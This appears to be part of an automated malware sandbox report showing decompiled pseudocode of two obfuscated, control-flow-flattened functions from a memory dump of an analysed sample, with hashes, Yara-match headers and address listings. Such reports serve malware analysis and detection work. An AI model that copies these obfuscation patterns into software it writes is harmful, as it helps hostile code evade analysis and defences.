                                              0x00000000
                                              0x00000000
                                              0x00234eef
                                              0x00234ef4
                                              0x00234ef6
                                              0x00234ef9
                                              0x00234efb
                                              0x00234f15
                                              0x00234efd
                                              0x00234efd
                                              0x00234f05
                                              0x00234f0b
                                              0x00234f0b
                                              0x00000000
                                              0x00234f64
                                              0x00234f64
                                              0x00234f64
                                              0x00234f71
                                              0x00234f7c

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
                                              • API String ID: 0-3958274775
                                              • Opcode ID: 34301f4765872c0dbd2b4a3acc372438c2240267da056750689c1ea27cf17036
                                              • Instruction ID: c090f4cb66322eb563ca2ed2e67e2bf96525339d5c5a45191c6408910ec297d6
                                              • Opcode Fuzzy Hash: 34301f4765872c0dbd2b4a3acc372438c2240267da056750689c1ea27cf17036
                                              • Instruction Fuzzy Hash: 63A175B11183819FD358DF64D48A42BFBE1FBC4358F204A1DF1969A2A0C3B9DA59CF46
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00233895, Relevance: 14.0, Strings: 11, Instructions: 274COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E00233895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0023AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0022B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00234F7D(_v632, _v628, _t324);
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0022F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0023889D(0x23c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x23ca2c; // 0x4d8300
												_t224 = _t321 + 0x230; // 0x700047
												E0022C680(_t224, _v648, _v608, _t303, _v636,  *0x23ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00232025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0022B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}




























































                                              0x00233895
                                              0x0023389b
                                              0x002338a5
                                              0x002338ad
                                              0x002338b2
                                              0x002338bd
                                              0x002338c5
                                              0x002338ca
                                              0x002338d2
                                              0x002338d7
                                              0x002338df
                                              0x002338e7
                                              0x002338ef
                                              0x002338f7
                                              0x002338ff
                                              0x00233907
                                              0x0023390f
                                              0x0023391e
                                              0x00233922
                                              0x00233924
                                              0x00233933
                                              0x00233934
                                              0x00233938
                                              0x00233940
                                              0x00233948
                                              0x00233950
                                              0x00233958
                                              0x0023395d
                                              0x00233965
                                              0x0023396d
                                              0x00233975
                                              0x0023397d
                                              0x00233985
                                              0x0023398d
                                              0x00233995
                                              0x0023399a
                                              0x002339a2
                                              0x002339b0
                                              0x002339b4
                                              0x002339bc
                                              0x002339c4
                                              0x002339d1
                                              0x002339d5
                                              0x002339da
                                              0x002339e2
                                              0x002339ef
                                              0x002339f3
                                              0x002339f7
                                              0x002339ff
                                              0x00233a07
                                              0x00233a0f
                                              0x00233a17
                                              0x00233a1f
                                              0x00233a27
                                              0x00233a2f
                                              0x00233a37
                                              0x00233a3f
                                              0x00233a44
                                              0x00233a49
                                              0x00233a51
                                              0x00233a59
                                              0x00233a5e
                                              0x00233a66
                                              0x00233a6e
                                              0x00233a76
                                              0x00233a7e
                                              0x00233a86
                                              0x00233a8e
                                              0x00233a96
                                              0x00233a9e
                                              0x00233aac
                                              0x00233ab4
                                              0x00233ab8
                                              0x00233ac0
                                              0x00233ac8
                                              0x00233ad0
                                              0x00233ad8
                                              0x00233ae0
                                              0x00233ae8
                                              0x00233af0
                                              0x00233af8
                                              0x00233b00
                                              0x00233b08
                                              0x00233b18
                                              0x00233b21
                                              0x00233b24
                                              0x00233b28
                                              0x00233b30
                                              0x00233b38
                                              0x00233b45
                                              0x00233b4e
                                              0x00233b52
                                              0x00233b5a
                                              0x00233b6a
                                              0x00233b6e
                                              0x00233b76
                                              0x00233b7e
                                              0x00233b83
                                              0x00233b8b
                                              0x00233b90
                                              0x00233b98
                                              0x00233ba0
                                              0x00233ba5
                                              0x00233bad
                                              0x00233bb5
                                              0x00233bba
                                              0x00233bc2
                                              0x00233bca
                                              0x00233bd2
                                              0x00233bd7
                                              0x00233bdc
                                              0x00233be4
                                              0x00233bec
                                              0x00233bf1
                                              0x00233bf9
                                              0x00233c01
                                              0x00233c0d
                                              0x00233c10
                                              0x00233c14
                                              0x00233c1c
                                              0x00233c20
                                              0x00233c28
                                              0x00233c30
                                              0x00233c38
                                              0x00233c38
                                              0x00233c4a
                                              0x00233db7
                                              0x00000000
                                              0x00233c50
                                              0x00233c52
                                              0x00233da5
                                              0x00233daa
                                              0x00233dad
                                              0x00000000
                                              0x00233c58
                                              0x00233c5e
                                              0x00233d0c
                                              0x00233d17
                                              0x00233d1e
                                              0x00233d26
                                              0x00233d2d
                                              0x00233d34
                                              0x00233d3b
                                              0x00233d57
                                              0x00233d5e
                                              0x00233d65
                                              0x00233d6c
                                              0x00233d73
                                              0x00233d7a
                                              0x00233d7e
                                              0x00233d80
                                              0x00233d83
                                              0x00000000
                                              0x00233c64
                                              0x00233c6a
                                              0x00233e2c
                                              0x00233c70
                                              0x00233c76
                                              0x00233cf4
                                              0x00233cfb
                                              0x00233d00
                                              0x00000000
                                              0x00233c78
                                              0x00233c78
                                              0x00233c7e
                                              0x00000000
                                              0x00233c84
                                              0x00233c84
                                              0x00233c91
                                              0x00233c96
                                              0x00233cb8
                                              0x00233cc2
                                              0x00233cc8
                                              0x00233ccd
                                              0x00233cde
                                              0x00233ce5
                                              0x00000000
                                              0x00233ce5
                                              0x00233c7e
                                              0x00233c76
                                              0x00233c6a
                                              0x00233c5e
                                              0x00233c52
                                              0x00233e35
                                              0x00233e3e
                                              0x00233e3e
                                              0x00233df7
                                              0x00233dfc
                                              0x00233dfe
                                              0x00233e01
                                              0x00233e04
                                              0x00233e10
                                              0x00000000
                                              0x00233e06
                                              0x00233e06
                                              0x00000000
                                              0x00233e06
                                              0x00000000
                                              0x00233e15
                                              0x00233e15
                                              0x00233e15
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: saved.Do you still want to force shutdown?$-($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
                                              • API String ID: 2962429428-1388804607
                                              • Opcode ID: 2e075c7cdf683e3939fe3cbf4af4495db51a26598be845c4cda261b8afa41627
                                              • Instruction ID: 1ddea031e37453bb103bb56d3b2b287b7fb3f7416d7385c528f6140f75e07024
                                              • Opcode Fuzzy Hash: 2e075c7cdf683e3939fe3cbf4af4495db51a26598be845c4cda261b8afa41627
                                              • Instruction Fuzzy Hash: A1D101B15183819FE368CF61C489A5BFBE1BBC4358F108A1DF1D9862A0D7B98659CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002342DA, Relevance: 7.9, Strings: 6, Instructions: 373COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E002342DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0023A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00238C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002394DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00225FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0022F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0022F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00228736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00228736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0022F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00237830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

































































                                              0x002342da
                                              0x002342e4
                                              0x002342eb
                                              0x002342ef
                                              0x002342f6
                                              0x002342fd
                                              0x00234304
                                              0x00234305
                                              0x00234306
                                              0x0023430b
                                              0x00234316
                                              0x00234319
                                              0x00234323
                                              0x0023432e
                                              0x00234330
                                              0x00234338
                                              0x0023433d
                                              0x00234342
                                              0x00234344
                                              0x00234348
                                              0x0023434d
                                              0x00234355
                                              0x0023435d
                                              0x00234365
                                              0x0023436a
                                              0x00234372
                                              0x0023437d
                                              0x00234388
                                              0x00234393
                                              0x0023439b
                                              0x002343a0
                                              0x002343a8
                                              0x002343b0
                                              0x002343b8
                                              0x002343c3
                                              0x002343cb
                                              0x002343d6
                                              0x002343de
                                              0x002343ed
                                              0x002343f0
                                              0x002343f4
                                              0x002343fc
                                              0x00234404
                                              0x00234409
                                              0x00234411
                                              0x00234419
                                              0x00234421
                                              0x00234429
                                              0x0023442e
                                              0x00234433
                                              0x0023443b
                                              0x00234443
                                              0x0023444b
                                              0x00234453
                                              0x0023445b
                                              0x00234463
                                              0x0023446e
                                              0x00234479
                                              0x00234484
                                              0x00234494
                                              0x0023449c
                                              0x0023449f
                                              0x002344a3
                                              0x002344ab
                                              0x002344b3
                                              0x002344bb
                                              0x002344c3
                                              0x002344cb
                                              0x002344d6
                                              0x002344e1
                                              0x002344ee
                                              0x002344fd
                                              0x00234500
                                              0x00234504
                                              0x0023450c
                                              0x00234514
                                              0x0023451c
                                              0x00234524
                                              0x0023452c
                                              0x00234534
                                              0x00234541
                                              0x00234545
                                              0x0023454d
                                              0x00234555
                                              0x00234568
                                              0x0023456f
                                              0x0023457a
                                              0x00234582
                                              0x00234587
                                              0x0023458f
                                              0x00234597
                                              0x0023459f
                                              0x002345af
                                              0x002345b3
                                              0x002345b8
                                              0x002345c0
                                              0x002345c8
                                              0x002345d4
                                              0x002345d9
                                              0x002345df
                                              0x002345e7
                                              0x002345f4
                                              0x002345f5
                                              0x002345f9
                                              0x00234601
                                              0x00234609
                                              0x00234611
                                              0x00234616
                                              0x0023461e
                                              0x00234629
                                              0x00234634
                                              0x0023463f
                                              0x00234647
                                              0x0023464f
                                              0x00234657
                                              0x0023465f
                                              0x00234667
                                              0x0023466f
                                              0x00234674
                                              0x0023467c
                                              0x0023468a
                                              0x0023468e
                                              0x00234696
                                              0x0023469b
                                              0x002346a3
                                              0x002346ab
                                              0x002346b3
                                              0x002346bb
                                              0x002346c3
                                              0x002346cb
                                              0x002346d0
                                              0x002346d8
                                              0x002346e0
                                              0x002346f0
                                              0x002346f5
                                              0x002346fe
                                              0x00234709
                                              0x00234714
                                              0x0023471f
                                              0x0023472a
                                              0x00234735
                                              0x0023473d
                                              0x00234748
                                              0x00234750
                                              0x00234758
                                              0x0023475d
                                              0x00234765
                                              0x0023476d
                                              0x00234778
                                              0x00234780
                                              0x0023478b
                                              0x00234793
                                              0x0023479b
                                              0x002347a3
                                              0x002347ab
                                              0x002347b3
                                              0x002347be
                                              0x002347c9
                                              0x002347d4
                                              0x002347e0
                                              0x002347e3
                                              0x002347e7
                                              0x002347ef
                                              0x002347f6
                                              0x002347fa
                                              0x002347fa
                                              0x002347ff
                                              0x002347ff
                                              0x00234805
                                              0x00000000
                                              0x00000000
                                              0x0023480b
                                              0x0023480b
                                              0x00234939
                                              0x0023494b
                                              0x00234950
                                              0x00234955
                                              0x002349e0
                                              0x002349e0
                                              0x00000000
                                              0x0023495b
                                              0x00234966
                                              0x0023496e
                                              0x00234980
                                              0x00234984
                                              0x00234988
                                              0x00000000
                                              0x00234988
                                              0x00000000
                                              0x00234811
                                              0x00234813
                                              0x002348d7
                                              0x002348fa
                                              0x002348fd
                                              0x00234902
                                              0x00234a70
                                              0x00234a70
                                              0x00234a74
                                              0x00000000
                                              0x00234819
                                              0x0023481f
                                              0x002348a2
                                              0x002348a9
                                              0x00000000
                                              0x00234821
                                              0x00234827
                                              0x00000000
                                              0x00234aa3
                                              0x00234833
                                              0x00234877
                                              0x0023487c
                                              0x00234884
                                              0x00000000
                                              0x00234835
                                              0x0023483b
                                              0x00234a79
                                              0x00234a7f
                                              0x00234a81
                                              0x002347ff
                                              0x002347ff
                                              0x00234805
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00234805
                                              0x00000000
                                              0x002347ff
                                              0x00234841
                                              0x00234850
                                              0x00234851
                                              0x00234857
                                              0x0023485c
                                              0x00234862
                                              0x00234868
                                              0x0023486d
                                              0x0023486d
                                              0x00234871
                                              0x00234871
                                              0x00000000
                                              0x00234871
                                              0x00234862
                                              0x0023483b
                                              0x00234833
                                              0x0023481f
                                              0x00234813
                                              0x00234aae
                                              0x00234aae
                                              0x00000000
                                              0x00234990
                                              0x00234996
                                              0x00234a4d
                                              0x00234a4e
                                              0x00234a54
                                              0x00234a59
                                              0x00234a5f
                                              0x00234a6b
                                              0x00000000
                                              0x00234a61
                                              0x00234a61
                                              0x00000000
                                              0x00234a61
                                              0x0023499c
                                              0x002349a2
                                              0x00234a10
                                              0x00234a15
                                              0x00234a19
                                              0x00234a1e
                                              0x00234a25
                                              0x00234a2e
                                              0x00234a33
                                              0x00000000
                                              0x002349a4
